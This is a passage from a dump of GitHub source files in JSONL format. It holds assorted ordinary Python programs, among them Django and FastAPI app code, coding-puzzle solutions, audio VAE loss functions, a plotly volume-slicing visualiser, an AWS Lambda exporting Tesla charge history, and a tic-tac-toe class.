url(r'^eliminar_period_mater/(?P\\d+)$',eliminar_periodo_materia, name ='eliminar_period_mater')\n]","repo_name":"dany240/regenerar","sub_path":"proyecto_final/materias_demas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71605091627","text":"news_read=open(\"C:\\\\Users\\\\deepa\\\\OneDrive\\\\Desktop\\\\python_works\\\\tokenization\\\\news.txt\",\"r\")\n\nwords_read=open(\"C:\\\\Users\\\\deepa\\\\OneDrive\\\\Desktop\\\\python_works\\\\tokenization\\\\stopwords.txt\",\"r\")\n\nstop_words={line.rstrip(\"\\n\") for line in words_read}\n\nnews_set=set()\n\nfor line in news_read:\n    words=line.split(\" \")\n    for w in words:\n        news_set.add(w)\n\nprint(news_set.difference(stop_words)) \n","repo_name":"deepakdpz/Pythonworks_Luminar","sub_path":"python_works/tokenization/processnews.py","file_name":"processnews.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26489950160","text":"# pile of socks to PAIR by COLOUR\n\n# input:\n# - n: number of socks\n# - ar: array of colours of socks\n\n# task:\n# determine how many pairs of socks with matching colours there are\n\n\ndef sock_merchant(num_of_socks, sock_pile):\n    sock_pile = sorted(sock_pile)\n\n    i = num_of_pairs = 0\n    while i < num_of_socks - 1:\n        if sock_pile[i] == sock_pile[i+1]:\n            num_of_pairs += 1\n            i += 2\n\n        else:\n            i += 1\n\n    return num_of_pairs\n\n\nn = int(input())\narr = 
map(int, input().strip().split(' '))\n\nprint(sock_merchant(n, arr))\n","repo_name":"ryotokuro/hackerrank","sub_path":"algorithms/sockMerchant.py","file_name":"sockMerchant.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"20375155810","text":"import os\nimport distutils\n\nfrom setuptools import Command\nfrom pkg_resources import normalize_path\nfrom contextlib import contextmanager\n\nfrom .base import CommandMixin, get_easy_install_cmd\nfrom pkglib.egg_cache import get_egg_cache_paths\n\n\n@contextmanager\ndef pip_logging_to_distutils_log():\n # Pip has some non-standard log levels, we'll wire them back into\n # regular logging or they get hidden from the user\n from pip.log import logger\n levels = {\n 'notify': 'info',\n 'debug': 'debug',\n 'info': 'info',\n 'error': 'error',\n 'fatal': 'fatal',\n 'warn': 'warn',\n }\n old_levels = dict((k, getattr(logger, k)) for k in levels.keys())\n for k, v in levels.items():\n setattr(logger, k, getattr(distutils.log, v))\n try:\n yield None\n finally:\n for k, v in old_levels.items():\n setattr(logger, k, v)\n\n\n@contextmanager\ndef patch_UninstallPathSet(egg_caches, install_dir):\n # pip uninstall doesn't realise that you can remove an entry from the virtualenv\n # easy-install.pth file even if the egg itself is outside the virtualenv i.e. in\n # the egg cache. Fix it by adjusting the pth file and entry.\n from pip import req\n ei_pth_file = os.path.join(normalize_path(install_dir), 'easy-install.pth')\n\n class UninstallPathSet(req.UninstallPathSet):\n def _can_uninstall(self):\n return True\n\n def add_pth(self, pth_file, entry):\n if any(pth_file.startswith(egg_cache) for egg_cache in egg_caches):\n pth_file, entry = ei_pth_file, self.dist.location\n super(UninstallPathSet, self).add_pth(pth_file, entry)\n req.UninstallPathSet, old_UninstallPathSet = UninstallPathSet, req.UninstallPathSet\n try:\n yield None\n finally:\n req.UninstallPathSet = old_UninstallPathSet\n\n\nclass pyuninstall(Command, CommandMixin):\n \"\"\" Remove a package. Calls pip.uninstall \"\"\"\n description = \"Remove a package. 
Uses pip.uninstall\"\n    command_consumes_arguments = True\n\n    user_options = [\n        ('yes', 'y', \"Don't ask for confirmation of uninstall deletions.\"),\n    ]\n    boolean_options = [\n        'yes',\n    ]\n\n    def initialize_options(self):\n        self.yes = False\n        self.args = []\n\n    def finalize_options(self):\n        pass\n\n    def run(self):\n        \"\"\" Wire in the pip uninstall command\n        \"\"\"\n        with pip_logging_to_distutils_log():\n            # Lazy imports here to allow pkglib to bootstrap itself.\n            from pip import req, exceptions\n\n            rs = req.RequirementSet(build_dir=None, src_dir=None, download_dir=None)\n            for name in self.args:\n                rs.add_requirement(req.InstallRequirement.from_line(name))\n\n            install_dir = get_easy_install_cmd(self.distribution).install_dir\n            with patch_UninstallPathSet(get_egg_cache_paths(), install_dir):\n                try:\n                    rs.uninstall(auto_confirm=self.yes)\n                except exceptions.UninstallationError as e:\n                    distutils.log.fatal(e)\n","repo_name":"man-group/pkglib","sub_path":"pkglib/pkglib/setuptools/command/pyuninstall.py","file_name":"pyuninstall.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"37"} +{"seq_id":"75224228906","text":"import numpy as np\nfrom scipy.misc import imsave\nfrom os import listdir, makedirs\nfrom os.path import isfile, join\nimport sys, getopt\n\nfrom SALICONtf import SALICONtf\n\n\ndef main(argv):\n    img_dir = ''\n    out_dir = ''\n\n    if argv:\n        opts, args = getopt.getopt(argv, \"i:o:w:\")\n    else:\n        print('Usage: python3 run_SALICON.py -w  -i  -o ')\n        sys.exit(2)\n\n    for opt, arg in opts:\n        if opt == '-i':\n            img_dir = arg\n        elif opt == '-o':\n            out_dir = arg\n        elif opt == '-w':\n            model_weights = arg\n\n    makedirs(out_dir, exist_ok=True)\n\n    images = [f for f in listdir(img_dir) if isfile(join(img_dir, f))]\n\n    s = SALICONtf(model_weights)\n\n    for img_name in images:\n        smap = s.compute_saliency(img_path=join(img_dir, img_name))\n        imsave(join(out_dir, img_name), smap)\n\n\nif __name__ == \"__main__\":\n    main(sys.argv[1:])\n","repo_name":"ykotseruba/SALICONtf","sub_path":"src/run_SALICONtf.py","file_name":"run_SALICONtf.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"3616461097","text":"import collections\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution(object):\n    def isSymmetric(self, root):\n        if root is None:\n            return True\n        queue = collections.deque([(root,root)])\n        while (len(queue)>0):\n            r1,r2 = queue.popleft()\n            if r1.val != r2.
val:\n return False\n if r1.left and r2.right:\n queue.append((r1.left,r2.right))\n elif not r1.left and r2.right or r1.left and not r2.right:\n return False\n if r2.left and r1.right:\n queue.append((r1.right,r2.left))\n elif not r1.right and r2.left or r1.right and not r2.left:\n return False\n return True\n \n\n ","repo_name":"quake0day/BugFree","sub_path":"101-Symmetric-Tree/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35211089446","text":"import torch \nfrom torchaudio.transforms import Spectrogram,MelSpectrogram\nimport torch.nn as nn\n\nfrom utils.utilities import safe_log\n\n#################\n# Loss Functions\n#################\n\n#################\n# Waveform VAEs losses\n#################\n\n# Note the below calculates the kl divergence per waveform.\ndef compute_kld(mu, logvar):\n\n mu = torch.flatten(mu, start_dim=1)\n logvar = torch.flatten(logvar, start_dim=1)\n\n kld_loss = torch.mean(-0.5 * torch.sum(1 + logvar - mu ** 2 - logvar.exp(), dim = 1), dim = 0)\n\n return kld_loss\n\nclass spectral_distances(nn.Module):\n def __init__(self,stft_scales=[2048, 1024, 512, 256, 128], mel_scales=[2048, 1024], spec_power=1, mel_dist=True, log_dist=0, sr=16000, device=\"cpu\"):\n super(spectral_distances, self).__init__()\n self.stft_scales = stft_scales\n self.mel_scales = mel_scales\n self.mel_dist = mel_dist\n self.log_dist = log_dist\n T_spec = []\n for scale in stft_scales:\n T_spec.append(Spectrogram(n_fft=scale,hop_length=scale//4,window_fn=torch.hann_window,power=spec_power).to(device))\n self.T_spec = T_spec\n if mel_dist:\n # print(\"\\n*** training with MelSpectrogram distance\")\n T_mel = []\n for scale in mel_scales:\n T_mel.append(MelSpectrogram(n_fft=scale,hop_length=scale//4,window_fn=torch.hann_window,sample_rate=sr,f_min=50.,n_mels=scale//4,power=spec_power).to(device))\n self.T_mel = T_mel\n \n def forward(self,x_inp,x_tar):\n loss = 0\n n_scales = 0\n for i,scale in enumerate(self.stft_scales):\n S_inp,S_tar = self.T_spec[i](x_inp),self.T_spec[i](x_tar)\n stft_dist = (S_inp-S_tar).abs().mean()\n loss = loss+stft_dist\n n_scales += 1\n if self.log_dist>0:\n loss = loss+(safe_log(S_inp)-safe_log(S_tar)).abs().mean()*self.log_dist\n n_scales += self.log_dist\n if self.mel_dist:\n for i,scale in enumerate(self.mel_scales):\n M_inp,M_tar = self.T_mel[i](x_inp),self.T_mel[i](x_tar)\n mel_dist = (M_inp-M_tar).abs().mean()\n loss = loss+mel_dist\n n_scales += 1\n if self.log_dist>0:\n loss = loss+(safe_log(M_inp)-safe_log(M_tar)).abs().mean()*self.log_dist\n n_scales += self.log_dist\n return loss/n_scales\n\ndef envelope_distance(x_inp,x_tar,n_fft=1024,log=True):\n\n # Reshapes, but are these really needed [bs, n_grains, num_samples] --> [bs*n_grains, num_samples]\n x_inp = x_inp.reshape(x_inp.shape[0]*x_inp.shape[1], x_inp.shape[2])\n x_tar = x_tar.reshape(x_tar.shape[0]*x_tar.shape[1], x_tar.shape[2])\n\n env_inp = torch.stft(x_inp, n_fft, hop_length=n_fft//4, onesided=True, return_complex=False)\n env_inp = torch.mean(env_inp[:,:,:,0]**2+env_inp[:,:,:,1]**2,1)\n env_tar = torch.stft(x_tar, n_fft, hop_length=n_fft//4, onesided=True, return_complex=False)\n env_tar = torch.mean(env_tar[:,:,:,0]**2+env_tar[:,:,:,1]**2,1)\n if log:\n env_inp,env_tar = safe_log(env_inp),safe_log(env_tar)\n return (env_inp-env_tar).abs().mean()\n\n############\n# Others\n############\n\ndef calc_reconstruction_loss(target, prediction):\n\n # MSE\n 
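# (i.e. mean((target - prediction)**2) over all elements; equivalent to\n    # torch.nn.functional.mse_loss(prediction, target) with the default 'mean' reduction)\n    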
error = target - prediction\n reconstruction_loss = torch.mean(error**2)\n\n return reconstruction_loss\n\n# This calculates the kl divergence \ndef calc_kl_loss(mu, log_variance):\n\n # KL Divergence between predicted gaussian distribution and standard guassian distribution N(0,1)\n kl_loss = - 0.5 * torch.sum(1 + log_variance - torch.square(mu) - torch.exp(log_variance))\n\n return kl_loss\n\n\n\ndef calc_combined_loss(target, prediction, mu, log_variance, reconstruction_loss_weight):\n\n reconstruction_loss = calc_reconstruction_loss(target, prediction)\n kl_loss = calc_kl_loss(mu, log_variance)\n combined_loss = (reconstruction_loss_weight * reconstruction_loss) + kl_loss\n\n return combined_loss, kl_loss, reconstruction_loss\n\ndef compute_losses(self, batch, beta):\n audio,labels = batch\n audio = audio.to(self.device)\n # forward\n audio_output,encoder_outputs = self.forward(audio, sampling=True)\n # compute losses\n spec_loss = self.spec_dist(audio_output,audio)\n if beta>0:\n kld_loss = compute_kld(encoder_outputs[\"mu\"],encoder_outputs[\"logvar\"])*beta\n else:\n kld_loss = 0\n if self.env_dist>0:\n env_loss = envelope_distance(audio_output,audio,n_fft=1024,log=True)*self.env_dist\n else:\n env_loss = 0\n return {\"spec_loss\":spec_loss,\"kld_loss\":kld_loss,\"env_loss\":env_loss}","repo_name":"aaron-dees/neuralGranularSynthesis","sub_path":"models/loss_functions.py","file_name":"loss_functions.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11972986377","text":"from cart.models import Cart\nfrom user.models import MyUser\nfrom newadmin.models import category\nfrom user.models import whishlist\n\ndef carts(request):\n if request.user.is_authenticated:\n cart_items = Cart.objects.filter(username = request.user).count()\n print(cart_items)\n return {'CART_ITEMS':cart_items }\n elif request.session.has_key('guest_user'):\n guest_user = request.session['guest_user']\n cart_items = Cart.objects.filter(guest_token = guest_user).count()\n return{'CART_ITEMS':cart_items}\n\n else:\n return{'CART_ITEMS':0}\n\n\ndef wish_list(request):\n if request.user.is_authenticated:\n whish_items = whishlist.objects.filter(user_name = request.user).count()\n return{'Whish_items': whish_items}\n else:\n return{'Whish_items':0}\n\ndef cat(request):\n cats = category.objects.all()\n return {'cat': cats}\n\n\n","repo_name":"mejokkurian/ecommerce-website","sub_path":"cart/context_processor.py","file_name":"context_processor.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6648231066","text":"from functools import lru_cache\n\nfrom typing import Optional\n\nfrom fastapi import Depends, HTTPException, status\nfrom sqlalchemy import select, text\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom db import get_async_session_app\n\nfrom .base import BaseService\nfrom models import Issue\n\n\nclass IssueService(BaseService):\n\n async def get_all_by_date(self, *args) -> list[Issue]:\n order_attribute, order_direction, created_at = args\n query = select(Issue).where(Issue.created_at.like(f'%{created_at}%'))\n selected_data = (await self.db_session.execute(query)).scalars().all()\n ordered_data = self.get_ordered_data(selected_data, order_attribute, order_direction)\n return ordered_data\n\n async def get_item_by_id(self, pk: int) -> Issue:\n query = select(Issue).where(Issue.id == pk)\n data = 
(await self.db_session.execute(query)).scalar()\n if not data:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND)\n return data\n\n async def make_comment(self, pk: int, comment: Optional[str]) -> Issue:\n current_issue = await self.get_item_by_id(pk)\n current_issue.comment = comment\n await self.db_session.commit()\n return current_issue\n\n\n@lru_cache\ndef get_issue_service(db_session: AsyncSession = Depends(get_async_session_app)) -> IssueService:\n return IssueService(db_session)\n","repo_name":"EvgeniyBugaiov/vodomat_api","sub_path":"src/services/issue.py","file_name":"issue.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4674612942","text":"from tqdm import tqdm\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport os\nimport numpy as np\nimport plotly.graph_objects as go\n\nproperties = {\n \"density\" : {\"cmap\": 'Blues_r', \"pos\": 0, \"vmin\": 20, \"vmax\": 18020},\n \"temp\" : {\"cmap\": 'hot', \"pos\": 1, \"vmin\": 72.16, \"vmax\": 30350},\n \"ab_H2\" : {\"cmap\": 'bone', \"pos\": 8, \"vmin\": 1.76e-14, \"vmax\": 6.911e-05},\n \"ab_H-\": {\"cmap\": 'pink', \"pos\": 7, \"vmin\": 1e-99, \"vmax\":1.629e-07},\n \"ab_H2+\": {\"cmap\": 'copper', \"pos\": 9, \"vmin\": 1e-99, \"vmax\": 1.691e-08}\n }\n\n\ndef GraphCreator(args):\n filereader = open(\"./Multifield/ExtractedCompleteData/\" + args[0], \"r\")\n timestep = args[0].split(\".\")[1]\n prop_name = args[1]\n planeEq = args[2]\n norm_min, norm_max = args[3]\n\n selected_property = []\n\n vmin = 100000007\n vmax = -11111111\n for lines in tqdm(range(0, 600*248*248)):\n d = filereader.readline()\n props = d.split(\" \")\n selected_property.append(float(props[properties[prop_name][\"pos\"]]))\n if(float(props[properties[prop_name][\"pos\"]]) < vmin): vmin = float(props[properties[prop_name][\"pos\"]])\n if(float(props[properties[prop_name][\"pos\"]]) > vmax): vmax = float(props[properties[prop_name][\"pos\"]])\n\n print(vmin, vmax)\n\n #TO perform Axis Aligned slicing -> Extract plane Y=Slicenum. 
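(e.g. the axis-aligned case A=0, B=1, C=0, D=100 selects the plane y = 100,\n    #and a fully arbitrary plane x + 2y + z = 300 gives y = (300 - x - z)/2)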
\n #For arbitrary plane, identify the z values that fall on this plane\n #Plane: Ax + By + Cz = D\n #For a given (A,B,C,D),(x,y) we can calculate the y value as:\n # y = (D - Ax - Cz)/B\n # We will colormap according to the values present at (x,y,z)\n\n X_len = 600\n Z_len = 248\n Y_coords = [[0 for i in range(Z_len)] for i in range(X_len)] #shape = (X_len, Z_len)\n X_coords, Z_coords = np.mgrid[0:X_len, 0:Z_len]\n\n val_dict = dict()\n\n frames = []\n\n k_change = planeEq[3]/10\n for kc in range(norm_min, norm_max):\n temp_planeEq = planeEq.copy()\n temp_planeEq[3] += kc*k_change\n\n temp_Y_coords = Y_coords.copy()\n\n for i in range(X_len):\n for j in range(Z_len):\n if(temp_planeEq[1] == 0): \n temp_Y_coords[i][j] = j # Handles parallel to Yaxis condition\n else: \n temp_Y_coords[i][j] = (int)((temp_planeEq[3] - temp_planeEq[0]*i -temp_planeEq[2]*j)/temp_planeEq[1])\n \n #Will store the property values and be used for colormapping\n prop_values = [[0 for i in range(Z_len)] for i in range(X_len)] \n for i in range(X_len):\n for j in range(Z_len):\n if(temp_Y_coords[i][j] < 0 or temp_Y_coords[i][j] >=248):\n prop_values[i][j] = properties[prop_name][\"vmin\"]\n else:\n prop_values[i][j] = selected_property[X_len*Z_len*j + 600*temp_Y_coords[i][j] + i]\n \n val_dict[kc] = dict(coord = temp_Y_coords, value = prop_values)\n \n frame = go.Frame(data = go.Surface(\n x = X_coords,\n y = Z_coords,\n z = val_dict[kc][\"coord\"],\n surfacecolor = val_dict[kc][\"value\"],\n coloraxis='coloraxis',\n cmin = properties[prop_name][\"vmin\"],\n cmax = properties[prop_name][\"vmax\"]\n ),\n name = str(kc))\n frames.append(frame)\n \n fig = go.Figure(frames=frames) \n fig.add_trace(\n go.Surface(\n x = X_coords,\n y = Z_coords,\n z = val_dict[norm_min][\"coord\"],\n surfacecolor = val_dict[norm_min][\"value\"],\n coloraxis='coloraxis',\n cmin = properties[prop_name][\"vmin\"],\n cmax = properties[prop_name][\"vmax\"]\n )\n )\n fig.update_layout(\n title_text = \"Arbitrary Volume Slicing \" + str(planeEq[0]) + \"x + \" + str(planeEq[1]) + \"y +\" + str(planeEq[2]) + \"z = k\" ,\n coloraxis=dict(\n colorscale=properties[prop_name][\"cmap\"],\n )\n )\n \n def frame_args(duration):\n return {\n \"frame\": {\"duration\": duration},\n \"mode\": \"immediate\",\n \"fromcurrent\": True,\n \"transition\": {\"duration\": duration, \"easing\": \"linear\"},\n }\n\n sliders = [\n {\n \"pad\": {\"b\": 10, \"t\": 60},\n \"len\": 0.9,\n \"x\": 0.1,\n \"y\": 0,\n \"steps\": [\n {\n \"args\": [[f.name], frame_args(0)],\n \"label\": str(k+norm_min),\n \"method\": \"animate\",\n }\n for k, f in enumerate(fig.frames)\n ],\n }\n ]\n fig.update_layout(\n scene=dict(\n xaxis = dict(range=[0,600], title=\"X position\"),\n yaxis = dict(range=[0,248], title=\"Z position\"),\n zaxis = dict(range=[0,248], title=\"Y position\")),\n width = 900,\n height = 900,\n updatemenus = [\n {\n \"buttons\": [\n {\n \"args\": [None, frame_args(50)],\n \"label\": \"▶\", # play symbol\n \"method\": \"animate\",\n },\n {\n \"args\": [[None], frame_args(0)],\n \"label\": \"◼\", # pause symbol\n \"method\": \"animate\",\n },\n ],\n \"direction\": \"left\",\n \"pad\": {\"r\": 10, \"t\": 70},\n \"type\": \"buttons\",\n \"x\": 0.1,\n \"y\": 0,\n }\n ],\n sliders=sliders\n )\n fig.show()\n\ndef SliceExtractor(timestep, prop_name, planeEq, minLim, maxLim): \n arguments = []\n tsep = \"\"\n if(timestep < 100): tstep = \"0\" + str(timestep)\n else: tstep = str(timestep) \n filename = \"multifield.0\" + tstep + \".txt\"\n \n temp_list = []\n 
temp_list.append(filename)\n temp_list.append(prop_name)\n temp_list.append(planeEq)\n temp_list.append([minLim, maxLim])\n\n arguments.append(temp_list)\n\n for args in arguments:\n GraphCreator(args)\n\ndef crossproduct(A, B):\n x = A[1]*B[2] - A[2]*B[1]\n y = - A[0]*B[2] + A[2]*B[0]\n z = A[0]*B[1] - A[1]*B[0]\n return [x,y,z]\n\ndef sub(A,B):\n return [A[0]-B[0], A[1]-B[1], A[2]-B[2]]\n\ndef GetPlaneEq(Point1, Point2, Point3):\n B_A = sub(Point2, Point1)\n C_A = sub(Point3, Point1)\n\n CP = crossproduct(B_A, C_A)\n\n k = lambda a : a[0]*Point1[0] + a[1]*Point1[1] + a[2]*Point1[2]\n D = k(CP)\n CP.append(D)\n return CP\n\n# Example 1 : Plane Parallel to Y axis\nPoint1 = [0,0,247]\nPoint2 = [0,247,247]\nPoint3 = [600,247,0]\nplaneEq_1 = GetPlaneEq(Point1, Point2, Point3)\n\n# print(planeEq_1)\n\n# Example 2 : Completely Arbitrary Plane\nPoint1 = [0,50,0]\nPoint2 = [0,150,247]\nPoint3 = [590,50,0]\nplaneEq_2 = GetPlaneEq(Point1, Point2, Point3)\n\nprint(planeEq_2)\n\n# Example 3: Plane Parallel to XZ plane\nPoint1 = [0,100,0]\nPoint2 = [0,100,247]\nPoint3 = [600,100,247]\nplaneEq_3 = GetPlaneEq(Point1, Point2, Point3)\n\n# print(planeEq_3)\n\nSliceExtractor(60, \"density\", planeEq_2, -10, 20)\n# SliceExtractor(60, \"density\", planeEq_1, -10, 20)","repo_name":"agam-kashyap/Data-Visualisation-2","sub_path":"SliceExtract.py","file_name":"SliceExtract.py","file_ext":"py","file_size_in_byte":7364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39089259687","text":"import teslapy\nimport boto3\nimport json\nimport time\nimport os\nimport logging\n\nemail_param = os.environ['EMAIL_SSM_PARAM_NAME']\nrefresh_token_param = os.environ['REFRESH_TOKEN_SSM_PARAM'] \nbucket = os.environ['BUCKET_NAME']\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\ns3 = boto3.resource('s3')\n\ndef db_load():\n logger.info('loading cache from s3')\n cache_obj = s3.Object(bucket, 'cache.json')\n response = cache_obj.get()\n body = response.get('Body').read()\n logger.info(f'loaded cache from s3: {body}')\n return json.loads(body)\n \ndef db_dump(cache):\n logger.info('saving cache to s3') \n cache_obj = s3.Object(bucket, 'cache.json')\n cache_obj.put(Body=(bytes(json.dumps(cache).encode('UTF-8'))))\n logger.info('saved cache to s3')\n\ndef handler(event, context):\n ssm_client = boto3.client('ssm')\n email = ssm_client.get_parameter(Name=email_param)['Parameter']['Value']\n refresh_token = ssm_client.get_parameter(Name=refresh_token_param)['Parameter']['Value']\n\n with teslapy.Tesla(email, cache_loader=db_load, cache_dumper=db_dump) as tesla:\n logger.info('refreshing tesla auth')\n try:\n tesla.refresh_token(refresh_token=refresh_token)\n except:\n logger.error('failed to refresh tesla auth')\n exit(1)\n \n logger.info('getting charge history')\n try:\n vehicle = tesla.vehicle_list()[0]\n charge_history = vehicle.get_charge_history()\n except:\n logger.error('failed to retrieve charge history')\n\n logger.info('storing data in s3')\n s3_object_name = f'charge_history/{int(time.time())}_charge_data.json'\n s3_object = s3.Object(bucket, s3_object_name)\n s3_object.put(Body=(bytes(json.dumps(charge_history).encode('UTF-8'))))\n logger.info(f'stored data in {s3_object_name} in bucket {bucket}')\n","repo_name":"cvanlaw/tesla-data-lambda","sub_path":"lambda/src/export_history.py","file_name":"export_history.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"35412955051","text":"#!/usr/bin/env python3\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(5)\nstudent_grades = np.random.normal(68, 15, 50)\n\nfig, ax = plt.subplots()\nfig.set_figheight(5)\nfig.set_figwidth(7.5)\nax.hist(student_grades, bins=range(0, 110, 10), linewidth=0.5, edgecolor=\"black\")\nax.set(xlim=(0, 100), ylim=(0, 30), xticks=np.arange(0,100,10))\nplt.title(\"Project A\")\nplt.xlabel(\"Grades\")\nplt.ylabel(\"Number of Students\")\n\nplt.show()\n","repo_name":"IHansen225/holbertonschool-machine_learning","sub_path":"math/plotting/4-frequency.py","file_name":"4-frequency.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5171351037","text":"\"\"\"\nTic-tac-toe board implementation.\n\"\"\"\n\n\nclass TicTacToeBoard:\n \"\"\"\n Tic-tac-toe board with basic play functionality.\n\n Attributes:\n player_1_mark: A string representing the first player's symbol.\n player_2_mark: A string representing the second player's symbol.\n blank_mark: A string representing a blank square symbol.\n _board: A list of lists representing the squares of the board.\n _next_move: A string representing the symbol of the next player to\n move.\n \"\"\"\n\n # Define class attributes for each player's symbol and for a blank square,\n # in case we ever want to change these later.\n player_1_mark = \"X\"\n player_2_mark = \"O\"\n blank_mark = \" \"\n\n def __init__(self):\n \"\"\"\n Create a new, empty TicTacToeBoard.\n \"\"\"\n # Writing the following ensures that each square of the board is\n # independent from each other. Writing something like\n # [[\" \"] * 3] * 3\n # will cause the board to be made up of copies of the same cell,\n # resulting in strange behavior.\n self._board = [[self.blank_mark for _ in range(3)] for _ in range(3)]\n self._next_move = self.player_1_mark\n\n def next_move(self):\n \"\"\"\n Return the symbol (X or O) of the next player to move.\n\n Returns:\n A string representing the next player's mark (X or O).\n \"\"\"\n return self._next_move\n\n def mark(self, row, col):\n \"\"\"\n If possible, mark a given square of the board with the next player's\n move.\n\n Given a row and column index (each 0, 1, or 2), mark the corresponding\n square of the board with the next player's move. Assume that each index\n is within the appropriate bounds. If a player's mark already exists at\n the requested square, raise an error instead.\n\n Args:\n row: An int representing the index of the row of the board to mark.\n col: An int representing the index of the column of the board to\n mark.\n\n Raises:\n ValueError: if the requested square already has a player's mark.\n \"\"\"\n if self.get_square(row, col) != self.blank_mark:\n raise ValueError\n self._board[row][col] = self._next_move\n\n # Change the next player to move here. 
An alternative would be to\n # calculate the next player to move based on the number of X's and O's\n # on the board, but this is easier.\n self._flip_next_move()\n\n def _flip_next_move(self):\n \"\"\"\n Change the next player to move.\n \"\"\"\n if self._next_move == self.player_1_mark:\n self._next_move = self.player_2_mark\n else:\n self._next_move = self.player_1_mark\n\n def _check_row_win(self, player):\n \"\"\"\n Check whether the given player has won along a row of the board.\n\n Args:\n player: A string representing the player's symbol (X or O).\n\n Returns:\n True if player has won along any row of the board and False\n otherwise.\n \"\"\"\n for row in range(3):\n if self._board[row][0] == self._board[row][1] \\\n == self._board[row][2] == player:\n return True\n return False\n\n def _check_col_win(self, player):\n \"\"\"\n Check whether the given player has won along a column of the board.\n\n Args:\n player: A string representing the player's symbol (X or O).\n\n Returns:\n True if player has won along any column of the board and False\n otherwise.\n \"\"\"\n for col in range(3):\n if self._board[0][col] == self._board[1][col] \\\n == self._board[2][col] == player:\n return True\n return False\n\n def _check_diag_win(self, player):\n \"\"\"\n Check whether the given player has won along a diagonal of the board.\n\n Args:\n player: A string representing the player's symbol (X or O).\n\n Returns:\n True if player has won along a diagonal of the board and False\n otherwise.\n \"\"\"\n # We use trace to refer to the diagonal from the upper left to the lower\n # right of the board.\n trace_win = True\n for i in range(3):\n if self._board[i][i] != player:\n trace_win = False\n break\n # We use trace to refer to the diagonal from the upper right to the\n # lower left of the board.\n cross_win = True\n for i in range(3):\n if self._board[i][2 - i] != player:\n cross_win = False\n break\n return trace_win or cross_win\n\n def check_win(self, player):\n \"\"\"\n Check that a given player has won (has three in a row) anywhere on the\n board.\n\n Args:\n player: A string representing the player's symbol (X or O).\n\n Returns:\n True if player has won and False otherwise.\n \"\"\"\n return (self._check_row_win(player) or self._check_col_win(player)\n or self._check_diag_win(player))\n\n def get_square(self, row, col):\n \"\"\"\n Return the mark at the given square of the board.\n\n Args:\n row: An int representing the index of the row of the board to get.\n col: An int representing the index of the column of the board to\n get.\n\n Returns:\n A string representing the contents of the given square (X, O, or a\n space).\n \"\"\"\n return self._board[row][col]\n\n def __repr__(self):\n \"\"\"\n Return a string representing the contents of the board.\n \"\"\"\n row_divider = \"+-+-+-+\"\n lines = [row_divider]\n for i in range(3):\n row = f\"|{'|'.join(self._board[i])}|\"\n lines.append(row)\n lines.append(row_divider)\n return \"\\n\".join(lines)\n","repo_name":"olincollege/softdes-open","sub_path":"assignments/6-software-architecture-design/tic_tac_toe_board.py","file_name":"tic_tac_toe_board.py","file_ext":"py","file_size_in_byte":6012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7023297678","text":"import pandas as pd\nimport numpy as np\nimport pickle\nfrom collections import defaultdict\nimport os.path\nimport glob\nfrom scipy.stats import entropy\nfrom Bio.SeqUtils.ProtParamData import kd\nfrom dnds_func import 
seq_ns\nfrom aa_chemical_properties import aa_charge, aa_charge_dict, aa_functional_group, aa_functional_group_dict, aa_propensity,\\\n propensity_chou_fasman, aa_volume_group, aa_volume, aa_volume_group_dict, aa_h_bond_donor, aa_h_bond_acceptor\nfrom ext_predictors_codes import sift_codes, polyphen_codes, clinvar_codes\nfrom calc_exac_freq_func import codon_table\nfrom entropy_func import SE_hist, JSD_background, JSD_hist\n\nfrom dsprint.core import POPULATIONS_ANS, POPULATIONS_ACS\nimport dsprint.data as data\n\n\nSIFT_THRESHOLD = 0.05\n\n# Rare SNP thresholds\nMAFT_5 = 0.005\nMAFT_05 = 0.0005\nMAFT_005 = 0.00005\n\npfam_aa_order = ['A', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'Y']\nAMINO_ACIDS = pfam_aa_order + ['*']\n\nHMM_STATES_FOLDER = snakemake.input.hmm_states_folder\nPROB_DICT = snakemake.input.prob_dict\nOUTPUT_CSV = snakemake.output.output_csv\n\n\ndef ExAC_MAF_features(sites_aa_num, sites_aa_alter_num, maf_list):\n\n d = {}\n\n # avg MAF\n d['avg_maf_all'] = 0 if sites_aa_num == 0 else np.sum(maf_list) / float(sites_aa_num)\n\n # avg MAF of all the 